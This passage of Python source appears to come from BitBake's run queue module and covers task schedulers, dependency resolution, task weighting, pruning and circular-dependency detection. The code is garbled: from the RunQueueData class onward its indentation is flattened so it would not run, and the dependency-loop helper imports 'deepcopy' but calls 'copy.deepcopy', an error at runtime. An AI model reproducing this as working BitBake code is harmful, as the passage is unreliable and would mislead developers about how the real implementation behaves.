                self.buildable.add(tid)

        self.rev_prio_map = None

    def next_buildable_task(self):
        """
        Return the id of the first task we find that is buildable
        """
        # Once tasks are running we don't need to worry about them again
        self.buildable.difference_update(self.rq.runq_running)
        buildable = set(self.buildable)
        buildable.difference_update(self.rq.holdoff_tasks)
        buildable.intersection_update(self.rq.tasks_covered | self.rq.tasks_notcovered)
        if not buildable:
            return None

        # Filter out tasks that have a max number of threads that have been exceeded
        skip_buildable = {}
        for running in self.rq.runq_running.difference(self.rq.runq_complete):
            rtaskname = taskname_from_tid(running)
            if rtaskname not in self.skip_maxthread:
                self.skip_maxthread[rtaskname] = self.rq.cfgData.getVarFlag(rtaskname, "number_threads")
            if not self.skip_maxthread[rtaskname]:
                continue
            if rtaskname in skip_buildable:
                skip_buildable[rtaskname] += 1
            else:
                skip_buildable[rtaskname] = 1

        if len(buildable) == 1:
            # Fast path: with a single candidate there is no need to
            # consult the priority map.
            tid = buildable.pop()
            taskname = taskname_from_tid(tid)
            if taskname in skip_buildable and skip_buildable[taskname] >= int(self.skip_maxthread[taskname]):
                return None
            stamp = self.stamps[tid]
            if stamp not in self.rq.build_stamps.values():
                return tid

        if not self.rev_prio_map:
            # Lazily build the tid -> priority reverse mapping.
            self.rev_prio_map = {}
            for tid in self.rqdata.runtaskentries:
                self.rev_prio_map[tid] = self.prio_map.index(tid)

        best = None
        bestprio = None
        for tid in buildable:
            taskname = taskname_from_tid(tid)
            if taskname in skip_buildable and skip_buildable[taskname] >= int(self.skip_maxthread[taskname]):
                continue
            prio = self.rev_prio_map[tid]
            if bestprio is None or bestprio > prio:
                stamp = self.stamps[tid]
                if stamp in self.rq.build_stamps.values():
                    continue
                bestprio = prio
                best = tid

        return best

    def next(self):
        """
        Return the id of the task we should build next
        """
        if self.rq.can_start_task():
            return self.next_buildable_task()

    def newbuildable(self, task):
        self.buildable.add(task)

    def removebuildable(self, task):
        self.buildable.remove(task)

    def describe_task(self, taskid):
        result = 'ID %s' % taskid
        if self.rev_prio_map:
            result = result + (' pri %d' % self.rev_prio_map[taskid])
        return result

    def dump_prio(self, comment):
        bb.debug(3, '%s (most important first):\n%s' %
                 (comment,
                  '\n'.join(['%d. %s' % (index + 1, self.describe_task(taskid)) for
                             index, taskid in enumerate(self.prio_map)])))
class RunQueueSchedulerSpeed(RunQueueScheduler):
    """
    A scheduler optimised for speed. The priority map is sorted by task weight,
    heavier weighted tasks (tasks needed by the most other tasks) are run first.
    """
    name = "speed"

    def __init__(self, runqueue, rqdata):
        """
        Build a priority map ordered by descending task weight.
        """
        RunQueueScheduler.__init__(self, runqueue, rqdata)

        # Bucket the tids by weight, then emit the buckets heaviest-first.
        buckets = {}
        for tid in self.rqdata.runtaskentries:
            weight = self.rqdata.runtaskentries[tid].weight
            buckets.setdefault(weight, []).append(tid)

        # Reversing each bucket reproduces the original whole-list reversal.
        self.prio_map = [tid for weight in sorted(buckets, reverse=True)
                         for tid in reversed(buckets[weight])]
class RunQueueSchedulerCompletion(RunQueueSchedulerSpeed):
    """
    A scheduler optimised to complete .bb files as quickly as possible. The
    priority map is sorted by task weight, but then reordered so once a given
    .bb file starts to build, it's completed as quickly as possible by
    running all tasks related to the same .bb file one after the after.
    This works well where disk space is at a premium and classes like OE's
    rm_work are in force.
    """
    name = "completion"

    def __init__(self, runqueue, rqdata):
        super(RunQueueSchedulerCompletion, self).__init__(runqueue, rqdata)

        # Extract list of tasks for each recipe, with tasks sorted
        # ascending from "must run first" (typically do_fetch) to
        # "runs last" (do_build). The speed scheduler prioritizes
        # tasks that must run first before the ones that run later;
        # this is what we depend on here.
        task_lists = {}
        for taskid in self.prio_map:
            fn, taskname = taskid.rsplit(':', 1)
            task_lists.setdefault(fn, []).append(taskname)

        # Now unify the different task lists. The strategy is that
        # common tasks get skipped and new ones get inserted after the
        # preceeding common one(s) as they are found. Because task
        # lists should differ only by their number of tasks, but not
        # the ordering of the common tasks, this should result in a
        # deterministic result that is a superset of the individual
        # task ordering.
        all_tasks = []
        for recipe, new_tasks in task_lists.items():
            # 'index' tracks our position in all_tasks as we merge this
            # recipe's ordered task list into the unified list.
            index = 0
            old_task = all_tasks[index] if index < len(all_tasks) else None
            for new_task in new_tasks:
                if old_task == new_task:
                    # Common task, skip it. This is the fast-path which
                    # avoids a full search.
                    index += 1
                    old_task = all_tasks[index] if index < len(all_tasks) else None
                else:
                    try:
                        index = all_tasks.index(new_task)
                        # Already present, just not at the current
                        # place. We re-synchronized by changing the
                        # index so that it matches again. Now
                        # move on to the next existing task.
                        index += 1
                        old_task = all_tasks[index] if index < len(all_tasks) else None
                    except ValueError:
                        # Not present. Insert before old_task, which
                        # remains the same (but gets shifted back).
                        all_tasks.insert(index, new_task)
                        index += 1
        bb.debug(3, 'merged task list: %s'  % all_tasks)

        # Now reverse the order so that tasks that finish the work on one
        # recipe are considered more imporant (= come first). The ordering
        # is now so that do_build is most important.
        all_tasks.reverse()

        # Group tasks of the same kind before tasks of less important
        # kinds at the head of the queue (because earlier = lower
        # priority number = runs earlier), while preserving the
        # ordering by recipe. If recipe foo is more important than
        # bar, then the goal is to work on foo's do_populate_sysroot
        # before bar's do_populate_sysroot and on the more important
        # tasks of foo before any of the less important tasks in any
        # other recipe (if those other recipes are more important than
        # foo).
        #
        # All of this only applies when tasks are runable. Explicit
        # dependencies still override this ordering by priority.
        #
        # Here's an example why this priority re-ordering helps with
        # minimizing disk usage. Consider a recipe foo with a higher
        # priority than bar where foo DEPENDS on bar. Then the
        # implicit rule (from base.bbclass) is that foo's do_configure
        # depends on bar's do_populate_sysroot. This ensures that
        # bar's do_populate_sysroot gets done first. Normally the
        # tasks from foo would continue to run once that is done, and
        # bar only gets completed and cleaned up later. By ordering
        # bar's task that depend on bar's do_populate_sysroot before foo's
        # do_configure, that problem gets avoided.
        task_index = 0
        self.dump_prio('original priorities')
        # Stable partition: for each task kind (in merged order), pull all
        # tids of that kind forward to task_index, preserving recipe order.
        for task in all_tasks:
            for index in range(task_index, self.numTasks):
                taskid = self.prio_map[index]
                taskname = taskid.rsplit(':', 1)[1]
                if taskname == task:
                    del self.prio_map[index]
                    self.prio_map.insert(task_index, taskid)
                    task_index += 1
        self.dump_prio('completion priorities')
class RunTaskEntry(object):
    """Per-task node in the runqueue dependency graph."""

    def __init__(self):
        # Forward and reverse dependency edges (sets of tids).
        self.depends = set()
        self.revdeps = set()
        # Signature/identity fields -- initialised empty here and
        # presumably filled in later by the runqueue machinery.
        self.hash = None
        self.unihash = None
        self.task = None
        self.weight = 1
class RunQueueData:
"""
BitBake Run Queue implementation
"""
    def __init__(self, rq, cooker, cfgData, dataCaches, taskData, targets):
        """
        Capture the cooker/configuration state needed to build the runqueue.

        :param rq: The owning RunQueue.
        :param cooker: The cooker instance.
        :param cfgData: Configuration datastore; queried below for the
                        whitelist and setscene-enforcement variables.
        :param dataCaches: Per-multiconfig recipe data caches.
        :param taskData: Per-multiconfig TaskData instances.
        :param targets: The requested build targets.
        """
        self.cooker = cooker
        self.dataCaches = dataCaches
        self.taskData = taskData
        self.targets = targets
        self.rq = rq
        self.warn_multi_bb = False

        # Whitelists controlling stamp handling and multi-provider warnings.
        self.stampwhitelist = cfgData.getVar("BB_STAMP_WHITELIST") or ""
        self.multi_provider_whitelist = (cfgData.getVar("MULTI_PROVIDER_WHITELIST") or "").split()
        # Setscene enforcement configuration (BB_SETSCENE_ENFORCE); the
        # whitelist itself is computed by a helper defined elsewhere in
        # this file.
        self.setscenewhitelist = get_setscene_enforce_whitelist(cfgData)
        self.setscenewhitelist_checked = False
        self.setscene_enforce = (cfgData.getVar('BB_SETSCENE_ENFORCE') == "1")
        self.init_progress_reporter = bb.progress.DummyMultiStageProcessProgressReporter()

        self.reset()
def reset(self):
self.runtaskentries = {}
def runq_depends_names(self, ids):
import re
ret = []
for id in ids:
nam = os.path.basename(id)
nam = re.sub("_[^,]*,", ",", nam)
ret.extend([nam])
return ret
def get_task_hash(self, tid):
return self.runtaskentries[tid].hash
def get_task_unihash(self, tid):
return self.runtaskentries[tid].unihash
def get_user_idstring(self, tid, task_name_suffix = ""):
return tid + task_name_suffix
def get_short_user_idstring(self, task, task_name_suffix = ""):
(mc, fn, taskname, taskfn) = split_tid_mcfn(task)
pn = self.dataCaches[mc].pkg_fn[taskfn]
taskname = taskname_from_tid(task) + task_name_suffix
return "%s:%s" % (pn, taskname)
    def circular_depchains_handler(self, tasks):
        """
        Some tasks aren't buildable, likely due to circular dependency issues.
        Identify the circular dependencies and print them in a user readable format.

        :param tasks: tids already identified as unbuildable.
        :return: A list of message strings describing up to 10 distinct
                 dependency loops found amongst *tasks*.
        """
        from copy import deepcopy

        valid_chains = []
        explored_deps = {}
        msgs = []

        # Raised internally to abandon the (potentially expensive) search
        # once enough loops have been reported.
        class TooManyLoops(Exception):
            pass

        def chain_reorder(chain):
            """
            Reorder a dependency chain so the lowest task id is first
            """
            lowest = 0
            new_chain = []
            for entry in range(len(chain)):
                if chain[entry] < chain[lowest]:
                    lowest = entry
            new_chain.extend(chain[lowest:])
            new_chain.extend(chain[:lowest])
            return new_chain

        def chain_compare_equal(chain1, chain2):
            """
            Compare two dependency chains and see if they're the same
            """
            if len(chain1) != len(chain2):
                return False
            for index in range(len(chain1)):
                if chain1[index] != chain2[index]:
                    return False
            return True

        def chain_array_contains(chain, chain_array):
            """
            Return True if chain_array contains chain
            """
            for ch in chain_array:
                if chain_compare_equal(ch, chain):
                    return True
            return False

        def find_chains(tid, prev_chain):
            # Depth-first walk over reverse dependencies, carrying the
            # current path; meeting a tid already on the path means a loop.
            prev_chain.append(tid)
            total_deps = []
            total_deps.extend(self.runtaskentries[tid].revdeps)
            for revdep in self.runtaskentries[tid].revdeps:
                if revdep in prev_chain:
                    idx = prev_chain.index(revdep)
                    # To prevent duplicates, reorder the chain to start with the lowest taskid
                    # and search through an array of those we've already printed
                    chain = prev_chain[idx:]
                    new_chain = chain_reorder(chain)
                    if not chain_array_contains(new_chain, valid_chains):
                        valid_chains.append(new_chain)
                        msgs.append("Dependency loop #%d found:\n" % len(valid_chains))
                        for dep in new_chain:
                            msgs.append("  Task %s (dependent Tasks %s)\n" % (dep, self.runq_depends_names(self.runtaskentries[dep].depends)))
                        msgs.append("\n")
                    if len(valid_chains) > 10:
                        msgs.append("Aborted dependency loops search after 10 matches.\n")
                        raise TooManyLoops
                    continue
                scan = False
                if revdep not in explored_deps:
                    scan = True
                elif revdep in explored_deps[revdep]:
                    scan = True
                else:
                    # Re-scan if any tid on the current path appears in the
                    # memoised deps of revdep (a loop may pass through it).
                    for dep in prev_chain:
                        if dep in explored_deps[revdep]:
                            scan = True
                if scan:
                    find_chains(revdep, copy.deepcopy(prev_chain))
                for dep in explored_deps[revdep]:
                    if dep not in total_deps:
                        total_deps.append(dep)

            # Memoise the accumulated reverse dependencies for this tid.
            explored_deps[tid] = total_deps

        try:
            for task in tasks:
                find_chains(task, [])
        except TooManyLoops:
            pass

        return msgs
def calculate_task_weights(self, endpoints):
"""
Calculate a number representing the "weight" of each task. Heavier weighted tasks
have more dependencies and hence should be executed sooner for maximum speed.
This function also sanity checks the task list finding tasks that are not
possible to execute due to circular dependencies.
"""
numTasks = len(self.runtaskentries)
weight = {}
deps_left = {}
task_done = {}
for tid in self.runtaskentries:
task_done[tid] = False
weight[tid] = 1
deps_left[tid] = len(self.runtaskentries[tid].revdeps)
for tid in endpoints:
weight[tid] = 10
task_done[tid] = True
while True:
next_points = []
for tid in endpoints:
for revdep in self.runtaskentries[tid].depends:
weight[revdep] = weight[revdep] + weight[tid]
deps_left[revdep] = deps_left[revdep] - 1
if deps_left[revdep] == 0:
next_points.append(revdep)
task_done[revdep] = True
endpoints = next_points
if len(next_points) == 0:
break
# Circular dependency sanity check
problem_tasks = []
for tid in self.runtaskentries:
if task_done[tid] is False or deps_left[tid] != 0:
problem_tasks.append(tid)
logger.debug(2, "Task %s is not buildable", tid)
logger.debug(2, "(Complete marker was %s and the remaining dependency count was %s)\n", task_done[tid], deps_left[tid])
self.runtaskentries[tid].weight = weight[tid]
if problem_tasks:
message = "%s unbuildable tasks were found.\n" % len(problem_tasks)
message = message + "These are usually caused by circular dependencies and any circular dependency chains found will be printed below. Increase the debug level to see a list of unbuildable tasks.\n\n"
message = message + "Identifying dependency loops (this may take a short while)...\n"
logger.error(message)
msgs = self.circular_depchains_handler(problem_tasks)
message = "\n"
for msg in msgs:
message = message + msg
bb.msg.fatal("RunQueue", message)
return weight
def prepare(self):
"""
Turn a set of taskData into a RunQueue and compute data needed
to optimise the execution order.
"""
runq_build = {}
recursivetasks = {}
recursiveitasks = {}
recursivetasksselfref = set()
taskData = self.taskData
found = False
for mc in self.taskData:
if len(taskData[mc].taskentries) > 0:
found = True
break
if not found:
# Nothing to do
return 0
self.init_progress_reporter.start()
self.init_progress_reporter.next_stage()
# Step A - Work out a list of tasks to run
#
# Taskdata gives us a list of possible providers for every build and run
# target ordered by priority. It also gives information on each of those
# providers.
#
# To create the actual list of tasks to execute we fix the list of
# providers and then resolve the dependencies into task IDs. This
# process is repeated for each type of dependency (tdepends, deptask,
# rdeptast, recrdeptask, idepends).
def add_build_dependencies(depids, tasknames, depends, mc):
for depname in depids:
# Won't be in build_targets if ASSUME_PROVIDED
if depname not in taskData[mc].build_targets or not taskData[mc].build_targets[depname]:
continue
depdata = taskData[mc].build_targets[depname][0]
if depdata is None:
continue
for taskname in tasknames:
t = depdata + ":" + taskname
if t in taskData[mc].taskentries:
depends.add(t)
def add_runtime_dependencies(depids, tasknames, depends, mc):
for depname in depids:
if depname not in taskData[mc].run_targets or not taskData[mc].run_targets[depname]:
continue
depdata = taskData[mc].run_targets[depname][0]
if depdata is None:
continue
for taskname in tasknames:
t = depdata + ":" + taskname
if t in taskData[mc].taskentries:
depends.add(t)
def add_mc_dependencies(mc, tid):
mcdeps = taskData[mc].get_mcdepends()
for dep in mcdeps:
mcdependency = dep.split(':')
pn = mcdependency[3]
frommc = mcdependency[1]
mcdep = mcdependency[2]
deptask = mcdependency[4]
if mc == frommc:
fn = taskData[mcdep].build_targets[pn][0]
newdep = '%s:%s' % (fn,deptask)
taskData[mc].taskentries[tid].tdepends.append(newdep)
for mc in taskData:
for tid in taskData[mc].taskentries:
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
#runtid = build_tid(mc, fn, taskname)
#logger.debug(2, "Processing %s,%s:%s", mc, fn, taskname)
depends = set()
task_deps = self.dataCaches[mc].task_deps[taskfn]
self.runtaskentries[tid] = RunTaskEntry()
if fn in taskData[mc].failed_fns:
continue
# We add multiconfig dependencies before processing internal task deps (tdepends)
if 'mcdepends' in task_deps and taskname in task_deps['mcdepends']:
add_mc_dependencies(mc, tid)
# Resolve task internal dependencies
#
# e.g. addtask before X after Y
for t in taskData[mc].taskentries[tid].tdepends:
(depmc, depfn, deptaskname, _) = split_tid_mcfn(t)
depends.add(build_tid(depmc, depfn, deptaskname))
# Resolve 'deptask' dependencies
#
# e.g. do_sometask[deptask] = "do_someothertask"
# (makes sure sometask runs after someothertask of all DEPENDS)
if 'deptask' in task_deps and taskname in task_deps['deptask']:
tasknames = task_deps['deptask'][taskname].split()
add_build_dependencies(taskData[mc].depids[taskfn], tasknames, depends, mc)
# Resolve 'rdeptask' dependencies
#
# e.g. do_sometask[rdeptask] = "do_someothertask"
# (makes sure sometask runs after someothertask of all RDEPENDS)
if 'rdeptask' in task_deps and taskname in task_deps['rdeptask']:
tasknames = task_deps['rdeptask'][taskname].split()
add_runtime_dependencies(taskData[mc].rdepids[taskfn], tasknames, depends, mc)
# Resolve inter-task dependencies
#
# e.g. do_sometask[depends] = "targetname:do_someothertask"
# (makes sure sometask runs after targetname's someothertask)
idepends = taskData[mc].taskentries[tid].idepends
for (depname, idependtask) in idepends:
if depname in taskData[mc].build_targets and taskData[mc].build_targets[depname] and not depname in taskData[mc].failed_deps:
# Won't be in build_targets if ASSUME_PROVIDED
depdata = taskData[mc].build_targets[depname][0]
if depdata is not None:
t = depdata + ":" + idependtask
depends.add(t)
if t not in taskData[mc].taskentries:
bb.msg.fatal("RunQueue", "Task %s in %s depends upon non-existent task %s in %s" % (taskname, fn, idependtask, depdata))
irdepends = taskData[mc].taskentries[tid].irdepends
for (depname, idependtask) in irdepends:
if depname in taskData[mc].run_targets:
# Won't be in run_targets if ASSUME_PROVIDED
if not taskData[mc].run_targets[depname]:
continue
depdata = taskData[mc].run_targets[depname][0]
if depdata is not None:
t = depdata + ":" + idependtask
depends.add(t)
if t not in taskData[mc].taskentries:
bb.msg.fatal("RunQueue", "Task %s in %s rdepends upon non-existent task %s in %s" % (taskname, fn, idependtask, depdata))
# Resolve recursive 'recrdeptask' dependencies (Part A)
#
# e.g. do_sometask[recrdeptask] = "do_someothertask"
# (makes sure sometask runs after someothertask of all DEPENDS, RDEPENDS and intertask dependencies, recursively)
# We cover the recursive part of the dependencies below
if 'recrdeptask' in task_deps and taskname in task_deps['recrdeptask']:
tasknames = task_deps['recrdeptask'][taskname].split()
recursivetasks[tid] = tasknames
add_build_dependencies(taskData[mc].depids[taskfn], tasknames, depends, mc)
add_runtime_dependencies(taskData[mc].rdepids[taskfn], tasknames, depends, mc)
if taskname in tasknames:
recursivetasksselfref.add(tid)
if 'recideptask' in task_deps and taskname in task_deps['recideptask']:
recursiveitasks[tid] = []
for t in task_deps['recideptask'][taskname].split():
newdep = build_tid(mc, fn, t)
recursiveitasks[tid].append(newdep)
self.runtaskentries[tid].depends = depends
# Remove all self references
self.runtaskentries[tid].depends.discard(tid)
#self.dump_data()
self.init_progress_reporter.next_stage()
# Resolve recursive 'recrdeptask' dependencies (Part B)
#
# e.g. do_sometask[recrdeptask] = "do_someothertask"
# (makes sure sometask runs after someothertask of all DEPENDS, RDEPENDS and intertask dependencies, recursively)
# We need to do this separately since we need all of runtaskentries[*].depends to be complete before this is processed
# Generating/interating recursive lists of dependencies is painful and potentially slow
# Precompute recursive task dependencies here by:
# a) create a temp list of reverse dependencies (revdeps)
# b) walk up the ends of the chains (when a given task no longer has dependencies i.e. len(deps) == 0)
# c) combine the total list of dependencies in cumulativedeps
# d) optimise by pre-truncating 'task' off the items in cumulativedeps (keeps items in sets lower)
revdeps = {}
deps = {}
cumulativedeps = {}
for tid in self.runtaskentries:
deps[tid] = set(self.runtaskentries[tid].depends)
revdeps[tid] = set()
cumulativedeps[tid] = set()
# Generate a temp list of reverse dependencies
for tid in self.runtaskentries:
for dep in self.runtaskentries[tid].depends:
revdeps[dep].add(tid)
# Find the dependency chain endpoints
endpoints = set()
for tid in self.runtaskentries:
if len(deps[tid]) == 0:
endpoints.add(tid)
# Iterate the chains collating dependencies
while endpoints:
next = set()
for tid in endpoints:
for dep in revdeps[tid]:
cumulativedeps[dep].add(fn_from_tid(tid))
cumulativedeps[dep].update(cumulativedeps[tid])
if tid in deps[dep]:
deps[dep].remove(tid)
if len(deps[dep]) == 0:
next.add(dep)
endpoints = next
#for tid in deps:
# if len(deps[tid]) != 0:
# bb.warn("Sanity test failure, dependencies left for %s (%s)" % (tid, deps[tid]))
# Loop here since recrdeptasks can depend upon other recrdeptasks and we have to
# resolve these recursively until we aren't adding any further extra dependencies
extradeps = True
while extradeps:
extradeps = 0
for tid in recursivetasks:
tasknames = recursivetasks[tid]
totaldeps = set(self.runtaskentries[tid].depends)
if tid in recursiveitasks:
totaldeps.update(recursiveitasks[tid])
for dep in recursiveitasks[tid]:
if dep not in self.runtaskentries:
continue
totaldeps.update(self.runtaskentries[dep].depends)
deps = set()
for dep in totaldeps:
if dep in cumulativedeps:
deps.update(cumulativedeps[dep])
for t in deps:
for taskname in tasknames:
newtid = t + ":" + taskname
if newtid == tid:
continue
if newtid in self.runtaskentries and newtid not in self.runtaskentries[tid].depends:
extradeps += 1
self.runtaskentries[tid].depends.add(newtid)
# Handle recursive tasks which depend upon other recursive tasks
deps = set()
for dep in self.runtaskentries[tid].depends.intersection(recursivetasks):
deps.update(self.runtaskentries[dep].depends.difference(self.runtaskentries[tid].depends))
for newtid in deps:
for taskname in tasknames:
if not newtid.endswith(":" + taskname):
continue
if newtid in self.runtaskentries:
extradeps += 1
self.runtaskentries[tid].depends.add(newtid)
bb.debug(1, "Added %s recursive dependencies in this loop" % extradeps)
# Remove recrdeptask circular references so that do_a[recrdeptask] = "do_a do_b" can work
for tid in recursivetasksselfref:
self.runtaskentries[tid].depends.difference_update(recursivetasksselfref)
self.init_progress_reporter.next_stage()
#self.dump_data()
# Step B - Mark all active tasks
#
# Start with the tasks we were asked to run and mark all dependencies
# as active too. If the task is to be 'forced', clear its stamp. Once
# all active tasks are marked, prune the ones we don't need.
logger.verbose("Marking Active Tasks")
def mark_active(tid, depth):
"""
Mark an item as active along with its depends
(calls itself recursively)
"""
if tid in runq_build:
return
runq_build[tid] = 1
depends = self.runtaskentries[tid].depends
for depend in depends:
mark_active(depend, depth+1)
def invalidate_task(tid, error_nostamp):
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
taskdep = self.dataCaches[mc].task_deps[taskfn]
if fn + ":" + taskname not in taskData[mc].taskentries:
logger.warning("Task %s does not exist, invalidating this task will have no effect" % taskname)
if 'nostamp' in taskdep and taskname in taskdep['nostamp']:
if error_nostamp:
bb.fatal("Task %s is marked nostamp, cannot invalidate this task" % taskname)
else:
bb.debug(1, "Task %s is marked nostamp, cannot invalidate this task" % taskname)
else:
logger.verbose("Invalidate task %s, %s", taskname, fn)
bb.parse.siggen.invalidate_task(taskname, self.dataCaches[mc], taskfn)
self.target_tids = []
for (mc, target, task, fn) in self.targets:
if target not in taskData[mc].build_targets or not taskData[mc].build_targets[target]:
continue
if target in taskData[mc].failed_deps:
continue
parents = False
if task.endswith('-'):
parents = True
task = task[:-1]
if fn in taskData[mc].failed_fns:
continue
# fn already has mc prefix
tid = fn + ":" + task
self.target_tids.append(tid)
if tid not in taskData[mc].taskentries:
import difflib
tasks = []
for x in taskData[mc].taskentries:
if x.startswith(fn + ":"):
tasks.append(taskname_from_tid(x))
close_matches = difflib.get_close_matches(task, tasks, cutoff=0.7)
if close_matches:
extra = ". Close matches:\n %s" % "\n ".join(close_matches)
else:
extra = ""
bb.msg.fatal("RunQueue", "Task %s does not exist for target %s (%s)%s" % (task, target, tid, extra))
# For tasks called "XXXX-", ony run their dependencies
if parents:
for i in self.runtaskentries[tid].depends:
mark_active(i, 1)
else:
mark_active(tid, 1)
self.init_progress_reporter.next_stage()
# Step C - Prune all inactive tasks
#
# Once all active tasks are marked, prune the ones we don't need.
delcount = {}
for tid in list(self.runtaskentries.keys()):
if tid not in runq_build:
delcount[tid] = self.runtaskentries[tid]
del self.runtaskentries[tid]
# Handle --runall
if self.cooker.configuration.runall:
# re-run the mark_active and then drop unused tasks from new list
runq_build = {}
for task in self.cooker.configuration.runall:
if not task.startswith("do_"):
task = "do_{0}".format(task)
runall_tids = set()
for tid in list(self.runtaskentries):
wanttid = "{0}:{1}".format(fn_from_tid(tid), task)
if wanttid in delcount:
self.runtaskentries[wanttid] = delcount[wanttid]
if wanttid in self.runtaskentries:
runall_tids.add(wanttid)
for tid in list(runall_tids):
mark_active(tid,1)
if self.cooker.configuration.force:
invalidate_task(tid, False)
for tid in list(self.runtaskentries.keys()):
if tid not in runq_build:
delcount[tid] = self.runtaskentries[tid]
del self.runtaskentries[tid]
if len(self.runtaskentries) == 0:
bb.msg.fatal("RunQueue", "Could not find any tasks with the tasknames %s to run within the recipes of the taskgraphs of the targets %s" % (str(self.cooker.configuration.runall), str(self.targets)))
self.init_progress_reporter.next_stage()
# Handle runonly
if self.cooker.configuration.runonly:
# re-run the mark_active and then drop unused tasks from new list
runq_build = {}
for task in self.cooker.configuration.runonly:
if not task.startswith("do_"):
task = "do_{0}".format(task)
runonly_tids = { k: v for k, v in self.runtaskentries.items() if taskname_from_tid(k) == task }
for tid in list(runonly_tids):
mark_active(tid,1)
if self.cooker.configuration.force:
invalidate_task(tid, False)
for tid in list(self.runtaskentries.keys()):
if tid not in runq_build:
delcount[tid] = self.runtaskentries[tid]
del self.runtaskentries[tid]
if len(self.runtaskentries) == 0:
bb.msg.fatal("RunQueue", "Could not find any tasks with the tasknames %s to run within the taskgraphs of the targets %s" % (str(self.cooker.configuration.runonly), str(self.targets)))
#
# Step D - Sanity checks and computation
#
# Check to make sure we still have tasks to run
if len(self.runtaskentries) == 0:
if not taskData[''].abort:
bb.msg.fatal("RunQueue", "All buildable tasks have been run but the build is incomplete (--continue mode). Errors for the tasks that failed will have been printed above.")
else:
bb.msg.fatal("RunQueue", "No active tasks and not in --continue mode?! Please report this bug.")
logger.verbose("Pruned %s inactive tasks, %s left", len(delcount), len(self.runtaskentries))
logger.verbose("Assign Weightings")
self.init_progress_reporter.next_stage()
# Generate a list of reverse dependencies to ease future calculations
for tid in self.runtaskentries:
for dep in self.runtaskentries[tid].depends:
self.runtaskentries[dep].revdeps.add(tid)
self.init_progress_reporter.next_stage()
# Identify tasks at the end of dependency chains
# Error on circular dependency loops (length two)
endpoints = []
for tid in self.runtaskentries:
revdeps = self.runtaskentries[tid].revdeps
if len(revdeps) == 0:
endpoints.append(tid)
for dep in revdeps:
if dep in self.runtaskentries[tid].depends:
bb.msg.fatal("RunQueue", "Task %s has circular dependency on %s" % (tid, dep))
logger.verbose("Compute totals (have %s endpoint(s))", len(endpoints))
self.init_progress_reporter.next_stage()
# Calculate task weights
# Check of higher length circular dependencies
self.runq_weight = self.calculate_task_weights(endpoints)
self.init_progress_reporter.next_stage()
# Sanity Check - Check for multiple tasks building the same provider
for mc in self.dataCaches:
prov_list = {}
seen_fn = []
for tid in self.runtaskentries:
(tidmc, fn, taskname, taskfn) = split_tid_mcfn(tid)
if taskfn in seen_fn:
continue
if mc != tidmc:
continue
seen_fn.append(taskfn)
for prov in self.dataCaches[mc].fn_provides[taskfn]:
if prov not in prov_list:
prov_list[prov] = [taskfn]
elif taskfn not in prov_list[prov]:
prov_list[prov].append(taskfn)
for prov in prov_list:
if len(prov_list[prov]) < 2:
continue
if prov in self.multi_provider_whitelist:
continue
seen_pn = []
# If two versions of the same PN are being built its fatal, we don't support it.
for fn in prov_list[prov]:
pn = self.dataCaches[mc].pkg_fn[fn]
if pn not in seen_pn:
seen_pn.append(pn)
else:
bb.fatal("Multiple versions of %s are due to be built (%s). Only one version of a given PN should be built in any given build. You likely need to set PREFERRED_VERSION_%s to select the correct version or don't depend on multiple versions." % (pn, " ".join(prov_list[prov]), pn))
msg = "Multiple .bb files are due to be built which each provide %s:\n %s" % (prov, "\n ".join(prov_list[prov]))
#
# Construct a list of things which uniquely depend on each provider
# since this may help the user figure out which dependency is triggering this warning
#
msg += "\nA list of tasks depending on these providers is shown and may help explain where the dependency comes from."
deplist = {}
commondeps = None
for provfn in prov_list[prov]:
deps = set()
for tid in self.runtaskentries:
fn = fn_from_tid(tid)
if fn != provfn:
continue
for dep in self.runtaskentries[tid].revdeps:
fn = fn_from_tid(dep)
if fn == provfn:
continue
deps.add(dep)
if not commondeps:
commondeps = set(deps)
else:
commondeps &= deps
deplist[provfn] = deps
for provfn in deplist:
msg += "\n%s has unique dependees:\n %s" % (provfn, "\n ".join(deplist[provfn] - commondeps))
#
# Construct a list of provides and runtime providers for each recipe
# (rprovides has to cover RPROVIDES, PACKAGES, PACKAGES_DYNAMIC)
#
msg += "\nIt could be that one recipe provides something the other doesn't and should. The following provider and runtime provider differences may be helpful."
provide_results = {}
rprovide_results = {}
commonprovs = None
commonrprovs = None
for provfn in prov_list[prov]:
provides = set(self.dataCaches[mc].fn_provides[provfn])
rprovides = set()
for rprovide in self.dataCaches[mc].rproviders:
if provfn in self.dataCaches[mc].rproviders[rprovide]:
rprovides.add(rprovide)
for package in self.dataCaches[mc].packages:
if provfn in self.dataCaches[mc].packages[package]:
rprovides.add(package)
for package in self.dataCaches[mc].packages_dynamic:
if provfn in self.dataCaches[mc].packages_dynamic[package]:
rprovides.add(package)
if not commonprovs:
commonprovs = set(provides)
else:
commonprovs &= provides
provide_results[provfn] = provides
if not commonrprovs:
commonrprovs = set(rprovides)
else:
commonrprovs &= rprovides
rprovide_results[provfn] = rprovides
#msg += "\nCommon provides:\n %s" % ("\n ".join(commonprovs))
#msg += "\nCommon rprovides:\n %s" % ("\n ".join(commonrprovs))
for provfn in prov_list[prov]:
msg += "\n%s has unique provides:\n %s" % (provfn, "\n ".join(provide_results[provfn] - commonprovs))
msg += "\n%s has unique rprovides:\n %s" % (provfn, "\n ".join(rprovide_results[provfn] - commonrprovs))
if self.warn_multi_bb:
logger.verbnote(msg)
else:
logger.error(msg)
self.init_progress_reporter.next_stage()
# Create a whitelist usable by the stamp checks
self.stampfnwhitelist = {}
for mc in self.taskData:
self.stampfnwhitelist[mc] = []
for entry in self.stampwhitelist.split():
if entry not in self.taskData[mc].build_targets:
continue
fn = self.taskData.build_targets[entry][0]
self.stampfnwhitelist[mc].append(fn)
self.init_progress_reporter.next_stage()
# Iterate over the task list looking for tasks with a 'setscene' function
self.runq_setscene_tids = set()
if not self.cooker.configuration.nosetscene:
for tid in self.runtaskentries:
(mc, fn, taskname, _) = split_tid_mcfn(tid)
setscenetid = tid + "_setscene"
if setscenetid not in taskData[mc].taskentries:
continue
self.runq_setscene_tids.add(tid)
self.init_progress_reporter.next_stage()
# Invalidate task if force mode active
if self.cooker.configuration.force:
for tid in self.target_tids:
invalidate_task(tid, False)
# Invalidate task if invalidate mode active
if self.cooker.configuration.invalidate_stamp:
for tid in self.target_tids:
fn = fn_from_tid(tid)
for st in self.cooker.configuration.invalidate_stamp.split(','):
if not st.startswith("do_"):
st = "do_%s" % st
invalidate_task(fn + ":" + st, True)
self.init_progress_reporter.next_stage()
